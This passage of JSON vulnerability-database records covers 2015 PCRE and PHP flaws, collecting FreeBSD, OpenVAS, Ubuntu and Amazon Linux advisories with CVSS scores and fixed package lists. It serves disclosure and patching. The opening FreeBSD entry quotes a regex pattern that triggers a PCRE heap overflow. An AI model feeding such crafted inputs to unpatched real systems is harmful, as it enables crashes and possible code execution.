FortiGuard Labs and given\n\t the CVE number CVE-2015-2325.\nA pattern such as \"((?+1)(\\1))/\" containing a forward\n\t reference subroutine call within a group that also contained\n\t a recursive back reference caused incorrect code to be\n\t compiled. This bug was reported as \"heap overflow\",\n\t discovered by Kai Lu of Fortinet's FortiGuard Labs,\n\t and given the CVE number CVE-2015-2326.\n\n", "published": "2015-04-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vuxml.freebsd.org/freebsd/4a88e3ed-00d3-11e5-a072-d050996490d0.html", "cvelist": ["CVE-2015-2325", "CVE-2015-2326"], "lastseen": "2016-09-26T17:24:19"}, {"id": "31DE2E13-00D2-11E5-A072-D050996490D0", "type": "freebsd", "title": "php -- multiple vulnerabilities", "description": "\nPHP development team reports:\n\nFixed bug #69364 (PHP Multipart/form-data remote DoS\n\t Vulnerability). (CVE-2015-4024)\nFixed bug #69418 (CVE-2006-7243 fix regressions in\n\t 5.4+). (CVE-2015-4025)\nFixed bug #69545 (Integer overflow in ftp_genlist()\n\t resulting in heap overflow). (CVE-2015-4022)\nFixed bug #68598 (pcntl_exec() should not allow null\n\t char). (CVE-2015-4026)\nFixed bug #69453 (Memory Corruption in phar_parse_tarfile\n\t when entry filename starts with null). (CVE-2015-4021)\n\n", "published": "2015-05-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/31de2e13-00d2-11e5-a072-d050996490d0.html", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "lastseen": "2016-09-26T17:24:19"}], "openvas": [{"id": "OPENVAS:1361412562310842393", "type": "openvas", "title": "Ubuntu Update for pcre3 USN-2694-1", "description": "Check the version of pcre3", "published": "2015-07-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842393", "cvelist": ["CVE-2015-3210", "CVE-2015-2325", "CVE-2014-8964", "CVE-2015-5073", "CVE-2015-2326"], "lastseen": "2018-04-30T14:07:28"}, {"id": "OPENVAS:1361412562310120224", "type": "openvas", "title": "Amazon Linux Local Check: alas-2015-534", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120224", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2017-07-24T12:52:39"}, {"id": "OPENVAS:1361412562310120107", "type": "openvas", "title": "Amazon Linux Local Check: alas-2015-563", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120107", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2017-07-24T12:52:45"}, {"id": "OPENVAS:1361412562310120108", "type": "openvas", "title": "Amazon Linux Local Check: alas-2015-562", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120108", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2017-07-24T12:53:43"}, {"id": "OPENVAS:1361412562310850932", "type": "openvas", "title": "SuSE Update for mariadb SUSE-SU-2015:1273-1 (mariadb)", "description": "Check the version of mariadb", "published": "2015-10-16T00:00:00", "cvss": {"score": 5.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:MULTIPLE_INSTANCES/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850932", "cvelist": ["CVE-2015-2325", "CVE-2015-2568", "CVE-2015-0501", "CVE-2015-2571", "CVE-2014-8964", "CVE-2015-3152", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2015-0505", "CVE-2015-2573", "CVE-2015-2326"], "lastseen": "2017-12-12T11:16:25"}, {"id": "OPENVAS:1361412562310842704", "type": "openvas", "title": "Ubuntu Update for pcre3 USN-2943-1", "description": "Check the version of pcre3", "published": "2016-04-11T00:00:00", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842704", "cvelist": ["CVE-2015-8388", "CVE-2015-3210", "CVE-2015-2325", "CVE-2015-8391", "CVE-2015-8395", "CVE-2015-8382", "CVE-2015-8386", "CVE-2015-2327", "CVE-2015-8392", "CVE-2015-8389", "CVE-2015-8380", "CVE-2016-1283", "CVE-2015-8393", "CVE-2015-8394", "CVE-2016-3191", "CVE-2015-8384", "CVE-2015-8383", "CVE-2015-8381", "CVE-2015-5073", "CVE-2015-8385", "CVE-2015-2328", "CVE-2014-9769", "CVE-2015-8387", "CVE-2015-8390", "CVE-2015-2326"], "lastseen": "2018-04-30T14:08:18"}, {"id": "OPENVAS:1361412562310850663", "type": "openvas", "title": "SuSE Update for MariaDB openSUSE-SU-2015:1216-1 (MariaDB)", "description": "Check the version of MariaDB", "published": "2015-07-10T00:00:00", "cvss": {"score": 8.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850663", "cvelist": ["CVE-2015-4000", "CVE-2014-6500", "CVE-2015-2325", "CVE-2015-2568", "CVE-2014-6507", "CVE-2014-6469", "CVE-2015-0501", "CVE-2015-0432", "CVE-2014-6496", "CVE-2014-6555", "CVE-2015-2571", "CVE-2014-6559", "CVE-2014-8964", "CVE-2014-6464", "CVE-2015-3152", "CVE-2015-0382", "CVE-2015-0374", "CVE-2014-6491", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2014-6568", "CVE-2015-0505", "CVE-2015-2573", "CVE-2014-6494", "CVE-2015-2326", "CVE-2015-0411", "CVE-2015-0381"], "lastseen": "2017-12-12T11:16:11"}, {"id": "OPENVAS:1361412562310120225", "type": "openvas", "title": "Amazon Linux Local Check: alas-2015-535", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120225", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "lastseen": "2017-07-24T12:53:50"}, {"id": "OPENVAS:1361412562310805655", "type": "openvas", "title": "PHP Multiple Vulnerabilities - 02 - Jun15 (Windows)", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "published": "2015-06-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805655", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "lastseen": "2017-10-25T14:39:20"}, {"id": "OPENVAS:1361412562310805660", "type": "openvas", "title": "PHP Multiple Vulnerabilities - 02 - Jun15 (Linux)", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "published": "2015-06-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805660", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "lastseen": "2017-10-25T14:40:41"}], "ubuntu": [{"id": "USN-2694-1", "type": "ubuntu", "title": "PCRE vulnerabilities", "description": "Michele Spagnuolo discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-8964)\n\nKai Lu discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-2325, CVE-2015-2326)\n\nWen Guanxing discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 15.04. (CVE-2015-3210)\n\nIt was discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and 14.04 LTS. (CVE-2015-5073)", "published": "2015-07-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://usn.ubuntu.com/2694-1/", "cvelist": ["CVE-2015-3210", "CVE-2015-2325", "CVE-2014-8964", "CVE-2015-5073", "CVE-2015-2326"], "lastseen": "2018-03-29T18:21:24"}, {"id": "USN-2943-1", "type": "ubuntu", "title": "PCRE vulnerabilities", "description": "It was discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code.", "published": "2016-03-29T00:00:00", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/2943-1/", "cvelist": ["CVE-2015-8388", "CVE-2015-3210", "CVE-2015-2325", "CVE-2015-8391", "CVE-2015-8395", "CVE-2015-8382", "CVE-2015-8386", "CVE-2015-2327", "CVE-2015-8392", "CVE-2015-8389", "CVE-2015-8380", "CVE-2016-1283", "CVE-2015-8393", "CVE-2015-8394", "CVE-2016-3191", "CVE-2015-8384", "CVE-2015-8383", "CVE-2015-8381", "CVE-2015-5073", "CVE-2015-8385", "CVE-2015-2328", "CVE-2014-9769", "CVE-2015-8387", "CVE-2015-8390", "CVE-2015-2326"], "lastseen": "2018-03-29T18:19:24"}, {"id": "USN-2658-1", "type": "ubuntu", "title": "PHP vulnerabilities", "description": "Neal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL bytes in file paths. A remote attacker could possibly use this issue to bypass intended restrictions and create or obtain access to sensitive files. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)\n\nEmmanuel Law discovered that the PHP phar extension incorrectly handled filenames starting with a NULL byte. A remote attacker could use this issue with a crafted tar archive to cause a denial of service. (CVE-2015-4021)\n\nMax Spelsberg discovered that PHP incorrectly handled the LIST command when connecting to remote FTP servers. A malicious FTP server could possibly use this issue to execute arbitrary code. (CVE-2015-4022, CVE-2015-4643)\n\nShusheng Liu discovered that PHP incorrectly handled certain malformed form data. A remote attacker could use this issue with crafted form data to cause CPU consumption, leading to a denial of service. (CVE-2015-4024)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated data types. A remote attacker could use this issue with crafted serialized data to possibly execute arbitrary code. (CVE-2015-4147)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated that the uri property is a string. A remote attacker could use this issue with crafted serialized data to possibly obtain sensitive information. (CVE-2015-4148)\n\nTaoguang Chen discovered that PHP incorrectly validated data types in multiple locations. A remote attacker could possibly use these issues to obtain sensitive information or cause a denial of service. (CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was discovered that the PHP Fileinfo component incorrectly handled certain files. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 15.04. (CVE-2015-4604, CVE-2015-4605)\n\nIt was discovered that PHP incorrectly handled table names in php_pgsql_meta_data. A local attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2015-4644)", "published": "2015-07-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/2658-1/", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "lastseen": "2018-03-29T18:19:07"}], "amazon": [{"id": "ALAS-2015-534", "type": "amazon", "title": "Important: php54", "description": "**Issue Overview:**\n\nAn integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. ([CVE-2015-4021 __](<https://access.redhat.com/security/cve/CVE-2015-4021>))\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. ([CVE-2015-4022 __](<https://access.redhat.com/security/cve/CVE-2015-4022>))\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. ([CVE-2015-4024 __](<https://access.redhat.com/security/cve/CVE-2015-4024>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4025 __](<https://access.redhat.com/security/cve/CVE-2015-4025>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4026 __](<https://access.redhat.com/security/cve/CVE-2015-4026>))\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>))\n\nPCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>))\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n php54-enchant-5.4.41-1.69.amzn1.i686 \n php54-mssql-5.4.41-1.69.amzn1.i686 \n php54-mbstring-5.4.41-1.69.amzn1.i686 \n php54-pdo-5.4.41-1.69.amzn1.i686 \n php54-gd-5.4.41-1.69.amzn1.i686 \n php54-pgsql-5.4.41-1.69.amzn1.i686 \n php54-mysql-5.4.41-1.69.amzn1.i686 \n php54-odbc-5.4.41-1.69.amzn1.i686 \n php54-soap-5.4.41-1.69.amzn1.i686 \n php54-embedded-5.4.41-1.69.amzn1.i686 \n php54-imap-5.4.41-1.69.amzn1.i686 \n php54-bcmath-5.4.41-1.69.amzn1.i686 \n php54-process-5.4.41-1.69.amzn1.i686 \n php54-recode-5.4.41-1.69.amzn1.i686 \n php54-mysqlnd-5.4.41-1.69.amzn1.i686 \n php54-fpm-5.4.41-1.69.amzn1.i686 \n php54-xmlrpc-5.4.41-1.69.amzn1.i686 \n php54-mcrypt-5.4.41-1.69.amzn1.i686 \n php54-snmp-5.4.41-1.69.amzn1.i686 \n php54-tidy-5.4.41-1.69.amzn1.i686 \n php54-cli-5.4.41-1.69.amzn1.i686 \n php54-intl-5.4.41-1.69.amzn1.i686 \n php54-dba-5.4.41-1.69.amzn1.i686 \n php54-debuginfo-5.4.41-1.69.amzn1.i686 \n php54-ldap-5.4.41-1.69.amzn1.i686 \n php54-xml-5.4.41-1.69.amzn1.i686 \n php54-pspell-5.4.41-1.69.amzn1.i686 \n php54-devel-5.4.41-1.69.amzn1.i686 \n php54-common-5.4.41-1.69.amzn1.i686 \n php54-5.4.41-1.69.amzn1.i686 \n \n src: \n php54-5.4.41-1.69.amzn1.src \n \n x86_64: \n php54-intl-5.4.41-1.69.amzn1.x86_64 \n php54-mysql-5.4.41-1.69.amzn1.x86_64 \n php54-common-5.4.41-1.69.amzn1.x86_64 \n php54-gd-5.4.41-1.69.amzn1.x86_64 \n php54-5.4.41-1.69.amzn1.x86_64 \n php54-tidy-5.4.41-1.69.amzn1.x86_64 \n php54-ldap-5.4.41-1.69.amzn1.x86_64 \n php54-mssql-5.4.41-1.69.amzn1.x86_64 \n php54-imap-5.4.41-1.69.amzn1.x86_64 \n php54-xml-5.4.41-1.69.amzn1.x86_64 \n php54-embedded-5.4.41-1.69.amzn1.x86_64 \n php54-cli-5.4.41-1.69.amzn1.x86_64 \n php54-enchant-5.4.41-1.69.amzn1.x86_64 \n php54-pdo-5.4.41-1.69.amzn1.x86_64 \n php54-odbc-5.4.41-1.69.amzn1.x86_64 \n php54-soap-5.4.41-1.69.amzn1.x86_64 \n php54-pgsql-5.4.41-1.69.amzn1.x86_64 \n php54-pspell-5.4.41-1.69.amzn1.x86_64 \n php54-recode-5.4.41-1.69.amzn1.x86_64 \n php54-mysqlnd-5.4.41-1.69.amzn1.x86_64 \n php54-process-5.4.41-1.69.amzn1.x86_64 \n php54-debuginfo-5.4.41-1.69.amzn1.x86_64 \n php54-xmlrpc-5.4.41-1.69.amzn1.x86_64 \n php54-devel-5.4.41-1.69.amzn1.x86_64 \n php54-fpm-5.4.41-1.69.amzn1.x86_64 \n php54-dba-5.4.41-1.69.amzn1.x86_64 \n php54-bcmath-5.4.41-1.69.amzn1.x86_64 \n php54-mcrypt-5.4.41-1.69.amzn1.x86_64 \n php54-snmp-5.4.41-1.69.amzn1.x86_64 \n php54-mbstring-5.4.41-1.69.amzn1.x86_64 \n \n \n", "published": "2015-06-02T22:20:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://alas.aws.amazon.com/ALAS-2015-534.html", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2016-09-28T21:04:15"}, {"id": "ALAS-2015-562", "type": "amazon", "title": "Medium: php55", "description": "**Issue Overview:**\n\nUpstream reports that several bugs have been fixed as well as several security issues into some bundled libraries ([CVE-2015-3414 __](<https://access.redhat.com/security/cve/CVE-2015-3414>), [CVE-2015-3415 __](<https://access.redhat.com/security/cve/CVE-2015-3415>), [CVE-2015-3416 __](<https://access.redhat.com/security/cve/CVE-2015-3416>), [CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>) and [CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>)). All PHP 5.5 users are encouraged to upgrade to this version. Please see the [upstream release notes](<http://php.net/ChangeLog-5.php#5.5.26>) for full details.\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n php55-cli-5.5.26-1.103.amzn1.i686 \n php55-odbc-5.5.26-1.103.amzn1.i686 \n php55-dba-5.5.26-1.103.amzn1.i686 \n php55-5.5.26-1.103.amzn1.i686 \n php55-bcmath-5.5.26-1.103.amzn1.i686 \n php55-common-5.5.26-1.103.amzn1.i686 \n php55-mysqlnd-5.5.26-1.103.amzn1.i686 \n php55-xml-5.5.26-1.103.amzn1.i686 \n php55-recode-5.5.26-1.103.amzn1.i686 \n php55-intl-5.5.26-1.103.amzn1.i686 \n php55-devel-5.5.26-1.103.amzn1.i686 \n php55-opcache-5.5.26-1.103.amzn1.i686 \n php55-gd-5.5.26-1.103.amzn1.i686 \n php55-gmp-5.5.26-1.103.amzn1.i686 \n php55-soap-5.5.26-1.103.amzn1.i686 \n php55-ldap-5.5.26-1.103.amzn1.i686 \n php55-imap-5.5.26-1.103.amzn1.i686 \n php55-debuginfo-5.5.26-1.103.amzn1.i686 \n php55-mbstring-5.5.26-1.103.amzn1.i686 \n php55-xmlrpc-5.5.26-1.103.amzn1.i686 \n php55-mcrypt-5.5.26-1.103.amzn1.i686 \n php55-mssql-5.5.26-1.103.amzn1.i686 \n php55-embedded-5.5.26-1.103.amzn1.i686 \n php55-pdo-5.5.26-1.103.amzn1.i686 \n php55-process-5.5.26-1.103.amzn1.i686 \n php55-pspell-5.5.26-1.103.amzn1.i686 \n php55-enchant-5.5.26-1.103.amzn1.i686 \n php55-fpm-5.5.26-1.103.amzn1.i686 \n php55-pgsql-5.5.26-1.103.amzn1.i686 \n php55-tidy-5.5.26-1.103.amzn1.i686 \n php55-snmp-5.5.26-1.103.amzn1.i686 \n \n src: \n php55-5.5.26-1.103.amzn1.src \n \n x86_64: \n php55-pspell-5.5.26-1.103.amzn1.x86_64 \n php55-imap-5.5.26-1.103.amzn1.x86_64 \n php55-embedded-5.5.26-1.103.amzn1.x86_64 \n php55-mcrypt-5.5.26-1.103.amzn1.x86_64 \n php55-5.5.26-1.103.amzn1.x86_64 \n php55-cli-5.5.26-1.103.amzn1.x86_64 \n php55-tidy-5.5.26-1.103.amzn1.x86_64 \n php55-gd-5.5.26-1.103.amzn1.x86_64 \n php55-odbc-5.5.26-1.103.amzn1.x86_64 \n php55-process-5.5.26-1.103.amzn1.x86_64 \n php55-mbstring-5.5.26-1.103.amzn1.x86_64 \n php55-gmp-5.5.26-1.103.amzn1.x86_64 \n php55-mssql-5.5.26-1.103.amzn1.x86_64 \n php55-snmp-5.5.26-1.103.amzn1.x86_64 \n php55-ldap-5.5.26-1.103.amzn1.x86_64 \n php55-devel-5.5.26-1.103.amzn1.x86_64 \n php55-mysqlnd-5.5.26-1.103.amzn1.x86_64 \n php55-common-5.5.26-1.103.amzn1.x86_64 \n php55-xml-5.5.26-1.103.amzn1.x86_64 \n php55-recode-5.5.26-1.103.amzn1.x86_64 \n php55-debuginfo-5.5.26-1.103.amzn1.x86_64 \n php55-fpm-5.5.26-1.103.amzn1.x86_64 \n php55-bcmath-5.5.26-1.103.amzn1.x86_64 \n php55-xmlrpc-5.5.26-1.103.amzn1.x86_64 \n php55-opcache-5.5.26-1.103.amzn1.x86_64 \n php55-enchant-5.5.26-1.103.amzn1.x86_64 \n php55-pgsql-5.5.26-1.103.amzn1.x86_64 \n php55-pdo-5.5.26-1.103.amzn1.x86_64 \n php55-intl-5.5.26-1.103.amzn1.x86_64 \n php55-dba-5.5.26-1.103.amzn1.x86_64 \n php55-soap-5.5.26-1.103.amzn1.x86_64 \n \n \n", "published": "2015-07-07T12:40:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2015-562.html", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2016-09-28T21:03:57"}, {"id": "ALAS-2015-563", "type": "amazon", "title": "Medium: php56", "description": "**Issue Overview:**\n\nUpstream reports that several bugs have been fixed as well as several security issues into some bundled libraries ([CVE-2015-3414 __](<https://access.redhat.com/security/cve/CVE-2015-3414>), [CVE-2015-3415 __](<https://access.redhat.com/security/cve/CVE-2015-3415>), [CVE-2015-3416 __](<https://access.redhat.com/security/cve/CVE-2015-3416>), [CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>) and [CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>)). All PHP 5.6 users are encouraged to upgrade to this version. Please see the [upstream release notes](<http://php.net/ChangeLog-5.php#5.6.10>) for full details.\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n php56-intl-5.6.10-1.115.amzn1.i686 \n php56-enchant-5.6.10-1.115.amzn1.i686 \n php56-snmp-5.6.10-1.115.amzn1.i686 \n php56-fpm-5.6.10-1.115.amzn1.i686 \n php56-pgsql-5.6.10-1.115.amzn1.i686 \n php56-mssql-5.6.10-1.115.amzn1.i686 \n php56-dba-5.6.10-1.115.amzn1.i686 \n php56-odbc-5.6.10-1.115.amzn1.i686 \n php56-mysqlnd-5.6.10-1.115.amzn1.i686 \n php56-mbstring-5.6.10-1.115.amzn1.i686 \n php56-5.6.10-1.115.amzn1.i686 \n php56-tidy-5.6.10-1.115.amzn1.i686 \n php56-pdo-5.6.10-1.115.amzn1.i686 \n php56-gd-5.6.10-1.115.amzn1.i686 \n php56-pspell-5.6.10-1.115.amzn1.i686 \n php56-recode-5.6.10-1.115.amzn1.i686 \n php56-opcache-5.6.10-1.115.amzn1.i686 \n php56-embedded-5.6.10-1.115.amzn1.i686 \n php56-dbg-5.6.10-1.115.amzn1.i686 \n php56-gmp-5.6.10-1.115.amzn1.i686 \n php56-debuginfo-5.6.10-1.115.amzn1.i686 \n php56-common-5.6.10-1.115.amzn1.i686 \n php56-ldap-5.6.10-1.115.amzn1.i686 \n php56-bcmath-5.6.10-1.115.amzn1.i686 \n php56-soap-5.6.10-1.115.amzn1.i686 \n php56-devel-5.6.10-1.115.amzn1.i686 \n php56-mcrypt-5.6.10-1.115.amzn1.i686 \n php56-imap-5.6.10-1.115.amzn1.i686 \n php56-xml-5.6.10-1.115.amzn1.i686 \n php56-cli-5.6.10-1.115.amzn1.i686 \n php56-process-5.6.10-1.115.amzn1.i686 \n php56-xmlrpc-5.6.10-1.115.amzn1.i686 \n \n src: \n php56-5.6.10-1.115.amzn1.src \n \n x86_64: \n php56-common-5.6.10-1.115.amzn1.x86_64 \n php56-dba-5.6.10-1.115.amzn1.x86_64 \n php56-mbstring-5.6.10-1.115.amzn1.x86_64 \n php56-enchant-5.6.10-1.115.amzn1.x86_64 \n php56-debuginfo-5.6.10-1.115.amzn1.x86_64 \n php56-devel-5.6.10-1.115.amzn1.x86_64 \n php56-process-5.6.10-1.115.amzn1.x86_64 \n php56-odbc-5.6.10-1.115.amzn1.x86_64 \n php56-xml-5.6.10-1.115.amzn1.x86_64 \n php56-bcmath-5.6.10-1.115.amzn1.x86_64 \n php56-imap-5.6.10-1.115.amzn1.x86_64 \n php56-embedded-5.6.10-1.115.amzn1.x86_64 \n php56-dbg-5.6.10-1.115.amzn1.x86_64 \n php56-pgsql-5.6.10-1.115.amzn1.x86_64 \n php56-ldap-5.6.10-1.115.amzn1.x86_64 \n php56-xmlrpc-5.6.10-1.115.amzn1.x86_64 \n php56-mysqlnd-5.6.10-1.115.amzn1.x86_64 \n php56-recode-5.6.10-1.115.amzn1.x86_64 \n php56-gmp-5.6.10-1.115.amzn1.x86_64 \n php56-intl-5.6.10-1.115.amzn1.x86_64 \n php56-mcrypt-5.6.10-1.115.amzn1.x86_64 \n php56-mssql-5.6.10-1.115.amzn1.x86_64 \n php56-snmp-5.6.10-1.115.amzn1.x86_64 \n php56-pspell-5.6.10-1.115.amzn1.x86_64 \n php56-cli-5.6.10-1.115.amzn1.x86_64 \n php56-fpm-5.6.10-1.115.amzn1.x86_64 \n php56-gd-5.6.10-1.115.amzn1.x86_64 \n php56-pdo-5.6.10-1.115.amzn1.x86_64 \n php56-tidy-5.6.10-1.115.amzn1.x86_64 \n php56-5.6.10-1.115.amzn1.x86_64 \n php56-opcache-5.6.10-1.115.amzn1.x86_64 \n php56-soap-5.6.10-1.115.amzn1.x86_64 \n \n \n", "published": "2015-07-07T12:40:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2015-563.html", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2016-09-28T21:04:15"}, {"id": "ALAS-2015-536", "type": "amazon", "title": "Important: php56", "description": "**Issue Overview:**\n\nAn integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. ([CVE-2015-4021 